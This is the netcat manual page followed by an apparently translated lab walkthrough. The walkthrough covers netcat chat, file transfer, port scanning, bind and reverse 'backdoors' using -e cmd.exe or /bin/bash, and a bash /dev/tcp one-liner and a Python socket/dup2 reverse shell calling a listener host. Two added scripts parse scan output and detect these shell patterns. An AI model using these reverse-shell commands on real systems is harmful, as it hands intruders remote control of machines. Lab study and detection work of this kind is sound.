Some worked examples follow the manual page.
NC(1) General Commands Manual
NAME
nc - TCP/IP swiss army knife
SYNOPSIS
nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]
DESCRIPTION
netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.
In the simplest usage, "nc host port" creates a TCP connection to the given port on the given target host. Your standard input is then sent to the host, and anything that comes back across the connection is sent to your standard output. This continues indefinitely, until the network side of the connection shuts down. Note that this behavior is different from most other applications which shut everything down and exit after an end-of-file on the standard input.
Netcat can also function as a server, by listening for inbound connections on arbitrary ports and then doing the same reading and writing. With minor limitations, netcat doesn't really care if it runs in "client" or "server" mode -- it still shovels data back and forth until there isn't any more left. In either mode, shutdown can be forced after a configurable time of inactivity on the network side.
And it can do this via UDP too, so netcat is possibly the "udp telnet-like" application you always wanted for testing your UDP-mode servers. UDP, as the "U" implies, gives less reliable data transmission than TCP connections and some systems may have trouble sending large amounts of data that way, but it's still a useful capability to have.
You may be asking "why not just use telnet to connect to arbitrary ports?" Valid question, and here are some reasons. Telnet has the "standard input EOF" problem, so one must introduce calculated delays in driving scripts to allow network output to finish. This is the main reason netcat stays running until the *network* side closes. Telnet also will not transfer arbitrary binary data, because certain characters are interpreted as telnet options and are thus removed from the data stream. Telnet also emits some of its diagnostic messages to standard output, where netcat keeps such things religiously separated from its *output* and will never modify any of the real data in transit unless you *really* want it to. And of course telnet is incapable of listening for inbound connections, or using UDP instead. Netcat doesn't have any of these limitations, is much smaller and faster than telnet, and has many other advantages.
OPTIONS
-c string     specify shell commands to exec after connect (use with caution). The string is passed to /bin/sh -c for execution. See the -e option if you don't have a working /bin/sh (Note that POSIX-conformant system must have one).
-e filename   specify filename to exec after connect (use with caution). See the -c option for enhanced functionality.
-g gateway    source-routing hop point[s], up to 8
-G num        source-routing pointer: 4, 8, 12, ...
-h            display help
-i secs       delay interval for lines sent, ports scanned
-l            listen mode, for inbound connects
-L            (Windows build) keep listening after the client closes the connection
-n            numeric-only IP addresses, no DNS
-o file       hex dump of traffic
-p port       local port number (port numbers can be individual or ranges: lo-hi [inclusive])
-q seconds    after EOF on stdin, wait the specified number of seconds and then quit. If seconds is negative, wait forever.
-b            allow UDP broadcasts
-r            randomize local and remote ports (any randomly chosen port will do for listening)
-s addr       local source address (used for spoofing)
-t            enable telnet negotiation
-u            UDP mode
-v            verbose [use twice to be more verbose]
-w secs       timeout for connects and final net reads
-C            Send CRLF as line-ending
-z            zero-I/O mode [used for scanning]
-T type       set TOS flag (type may be one of "Minimize-Delay", "Maximize-Throughput", "Maximize-Reliability", or "Minimize-Cost".)
COPYRIGHT
Netcat is entirely my own creation, although plenty of other code was used as examples. It is freely given away to the Internet community in the hope that it will be useful, with no restrictions except giving credit where it is due. No GPLs, Berkeley copyrights or any of that nonsense. The author assumes NO responsibility for how anyone uses it. If netcat makes you rich somehow and you're feeling generous, mail me a check. If you are affiliated in any way with Microsoft Network, get a life. Always ski in control. Comments, questions, and patches to hobbit@avian.org.
NOTES
Some port names in /etc/services contain hyphens -- netcat currently will not correctly parse those unless you escape the hyphens with backslashes (e.g. "netcat localhost 'ftp\-data'").
BUGS
Efforts have been made to have netcat "do the right thing" in all its various modes. If you believe that it is doing the wrong thing under whatever circumstances, please notify me and tell me how you think it should behave. If netcat is not able to do some task you think up, minor tweaks to the code will probably fix that. It provides a basic and easily-modified template for writing other network applications, and I certainly encourage people to make custom mods and send in any improvements they make to it. Continued feedback from the Internet community is always welcome!
EXAMPLES
For several netcat recipes, please see /usr/share/doc/netcat/README.gz
and /usr/share/doc/netcat/README.Debian.gz.
AUTHOR
This manual page was written by Joey Hess <joeyh@debian.org> and Robert
Woodcock <rcw@debian.org>, cribbing heavily from Netcat's README file.
Netcat was written by a guy we know as the Hobbit <hobbit@avian.org>.
NC(1)
Download: https://eternallybored.org/misc/netcat/
Here are some simple examples (Windows 64-bit):
- Start the server:
Open a window
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444
(accept the firewall prompt) the server is now listening
- Connect to the server
Then open another window and type
# use your own IP address
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444
There is no echo or prompt at this point, but the connection has succeeded; type anything.
Messages sent by the client are printed by the server, and messages sent by the server are printed by the client.
- Start a shell server
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 -e cmd.exe
- Connect to it
sanqiushu@DESKTOP-343EN6M:~$ nc 10.20.3.129 4444
Microsoft Windows [汾 10.0.17134.885]
(c) 2018 Microsoft Corporation?
F:\SecTools\apps\netcat-win32-1.12>
After connecting, a command prompt comes straight back (I used the Linux version of nc to get a different path).
F:\SecTools\apps\netcat-win32-1.12>dir
dir
F е? ?
к 1646-F9AD
F:\SecTools\apps\netcat-win32-1.12 ??
2019/08/14 15:08 <DIR> .
2019/08/14 15:08 <DIR> ..
2004/12/28 12:23 12,166 doexec.c
1996/07/09 17:01 7,283 generic.h
1996/11/06 23:40 22,784 getopt.c
1994/11/03 20:07 4,765 getopt.h
1998/02/06 16:50 61,780 hobbit.txt
2004/12/27 18:37 18,009 license.txt
2011/09/17 00:46 300 Makefile
2019/08/14 14:42 4 nc.bat
2011/09/17 00:52 38,616 nc.exe
2011/09/17 00:52 45,272 nc64.exe
2011/09/17 00:44 69,850 netcat.c
2011/09/17 00:45 6,885 readme.txt
12 ? 287,714 ?
2 ?? 199,469,047,808 ?
F:\SecTools\apps\netcat-win32-1.12>
Commands can be run directly (but the garbled Chinese output is a headache); from now on it looks like Windows to Windows and Linux to Linux.
- Transfer files
Server receives a file
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 >F:\SecTools\apps\netcat-win32-1.12\readme2.txt
Client sends a file
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
Neither side shows any reaction, but the transfer has completed.
Why does Windows require an absolute path?
The Linux sender seems to need an absolute path too???
Client receives a file
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 > F:\SecTools\apps\netcat-win32-1.12\readme3.txt
Server sends a file
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
You can use a parameter such as -w5 to set a wait time: if the connection is not established within 5 s because of network delay, the command ends.
The Windows nc's port scan is incredibly slow; by the time it finished I was worn out.
The Ubuntu one is not good either.
But the nc on Kali Linux is really capable.
root@Sanqiushu:~# nc -z -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
root@Sanqiushu:~#
A scan of all ports took less than 2 minutes
root@Sanqiushu:~# echo "" | nc -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
root@Sanqiushu:~#
Some services don't reply with banner information
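As an added example (not part of the original post), a short Python script that parses the `nc -v -n` scan output shown above and reports open ports that are not on an allowlist of expected services, which is how a defender would use such a scan against their own hosts. The sample output and the allowlist are constructed here, and attaching banner lines to the most recently reported port is a heuristic.

```python
import re

# Constructed sample of `echo "" | nc -v -n host 1-65535` output, modelled on
# the lines shown above (not a real capture).
SAMPLE_SCAN = """\
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
"""

# One open-port report: "(hostname) [ip] port (service) open".
# With -n the hostname is always (UNKNOWN); the service name comes from /etc/services.
OPEN_RE = re.compile(
    r"^\((?P<host>[^)]*)\) \[(?P<ip>[^\]]+)\] (?P<port>\d+) \((?P<svc>[^)]*)\) open$"
)

def parse_nc_scan(text):
    """Return one dict per open port reported by nc -v.

    Lines that are not open-port reports are treated as banner output and
    attached to the most recently reported open port. That is only a
    heuristic: nc prints banners as they arrive, not in scan order.
    """
    results = []
    for line in text.splitlines():
        m = OPEN_RE.match(line)
        if m:
            results.append({"ip": m.group("ip"), "port": int(m.group("port")),
                            "service": m.group("svc"), "banner": []})
        elif results and line.strip():
            results[-1]["banner"].append(line.strip())
    return results

def unexpected_ports(results, expected):
    """(ip, port) pairs that are open but not in the expected set for that host.

    `expected` maps an IP address to the set of ports it is supposed to expose.
    """
    return sorted((r["ip"], r["port"]) for r in results
                  if r["port"] not in expected.get(r["ip"], set()))

if __name__ == "__main__":
    found = parse_nc_scan(SAMPLE_SCAN)
    for r in found:
        print(r["ip"], r["port"], r["service"], r["banner"])
    # Only SSH is supposed to be reachable on this (constructed) host.
    print("unexpected:", unexpected_ports(found, {"10.20.7.7": {22}}))
```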
- Set up a listening (bind) backdoor
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444 -e cmd.exe
- Set up a connecting (reverse) backdoor
Start listening on your own server
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
Client connects
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 -e cmd.exe
Once the client connects, the server gets a command-line terminal
Microsoft Windows [版本 10.0.17134.885]
(c) 2018 Microsoft Corporation短条。保留所有權(quán)利。
F:\SecTools\apps\netcat-win32-1.12>
Windows side starts the service
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
Kali connects
root@Sanqiushu:~# nc 10.20.3.129 4444 -e /bin/bash
Although nothing is echoed back, the shell has already been returned and commands can be run directly (if you type a wrong command you won't see the error message on your side, which is odd); some Linux nc builds, for example Ubuntu's, have no -e option.
Use the -d parameter to run nc in the background.
- Port forwarding
A wants to connect to C but cannot do so directly, so B is used to forward the connection.
(The forwarding commands were shown only as screenshots, which are not included here.)
- Reverse bash shell from a Linux machine without nc
Start the nc server on Kali (firewall turned off)
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
Then on Ubuntu enter the command
sanqiushu@sanqiushu-VirtualBox:~$ bash -i >& /dev/tcp/10.20.2.185/4444 0>&1
Kali receives the shell
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35130
sanqiushu@sanqiushu-VirtualBox:~$ ls
ls
vulhub
公共的
模板
視頻
圖片
文檔
下載
音樂
桌面
sanqiushu@sanqiushu-VirtualBox:~$
- Python shell from a Linux machine without nc
Set up the nc server on Kali
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
Ubuntu starts the Python client
sanqiushu@sanqiushu-VirtualBox:~$ python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
Kali receives the connection
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35144
sanqiushu@sanqiushu-VirtualBox:~$ ls
vulhub
公共的
模板
視頻
圖片
文檔
下載
音樂
桌面
sanqiushu@sanqiushu-VirtualBox:~$
Python 2 code
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.20.2.185',4444)) # open a connection s to the listener; change IP and port as needed
os.dup2(s.fileno(),0) # redirect stdin to s's file descriptor
os.dup2(s.fileno(),1) # redirect stdout to s's file descriptor
os.dup2(s.fileno(),2) # redirect stderr to s's file descriptor
p=subprocess.call(['/bin/bash','-i'])
Afterwards, use Python to spawn an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
- Reverse shell with an nc that does not support -e
nc 10.20.2.185 4444 | /bin/bash | nc 10.20.2.185 4445
Rather slow; I waited about 10 s
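As an added example (not from the original post), a small Python detector that runs the bind-shell and reverse-shell command patterns from this page (nc with -e/-c, bash redirected to /dev/tcp, the Python socket/dup2 one-liner, the two-nc pipe) over constructed process-creation log lines, the kind of check a host monitoring rule would implement. The log format, hostnames and user names are made up for the example.

```python
import re

# Constructed process-creation log lines: "timestamp host user command line".
# The commands mirror the techniques shown on this page; hosts and users are invented.
SAMPLE_LOG = """\
2019-08-14T15:08:01 win10-lab alice nc64 -l -p 4444 -e cmd.exe
2019-08-14T15:09:12 win10-lab alice nc64 10.20.3.129 4444 -e cmd.exe
2019-08-14T15:10:05 ubuntu-vm bob bash -i >& /dev/tcp/10.20.2.185/4444 0>&1
2019-08-14T15:11:40 ubuntu-vm bob python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
2019-08-14T15:12:03 ubuntu-vm bob nc 10.20.2.185 4444 | /bin/bash | nc 10.20.2.185 4445
2019-08-14T15:13:30 ubuntu-vm bob nc -z -v -n 10.20.7.7 1-65535
2019-08-14T15:14:00 win10-lab alice nc64 10.20.3.129 4444 < F:\\SecTools\\apps\\netcat-win32-1.12\\readme.txt
"""

# A netcat binary name at the start of the command or after a separator.
NC_NAMES = r"(?:^|[\s|;&/\\])(?:nc|nc64|ncat|netcat)(?:\.exe)?\s"

# (rule name, pattern); a plain scan or file transfer matches none of these.
RULES = [
    ("netcat -e/-c exec", re.compile(NC_NAMES + r".*\s-[ec]\s+\S", re.I)),
    ("bash /dev/tcp reverse shell",
     re.compile(r"bash\b.*>&\s*/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+", re.I)),
    ("python socket+dup2 shell",
     re.compile(r"python\d?(?:\.\d+)?\s+-c\s.*socket.*dup2.*(?:subprocess|pty)", re.I)),
    ("two-netcat pipe shell",
     re.compile(NC_NAMES + r".*\|\s*/bin/(?:ba)?sh\s*\|\s*(?:nc|ncat|netcat)\b", re.I)),
]

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<user>\S+) (?P<cmd>.*)$")

def detect_shells(log_text):
    """Return (timestamp, host, user, rule name) for each command line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, rx in RULES:
            if rx.search(m.group("cmd")):
                hits.append((m.group("ts"), m.group("host"), m.group("user"), name))
                break  # one alert per process is enough
    return hits

if __name__ == "__main__":
    for hit in detect_shells(SAMPLE_LOG):
        print("ALERT", *hit)
```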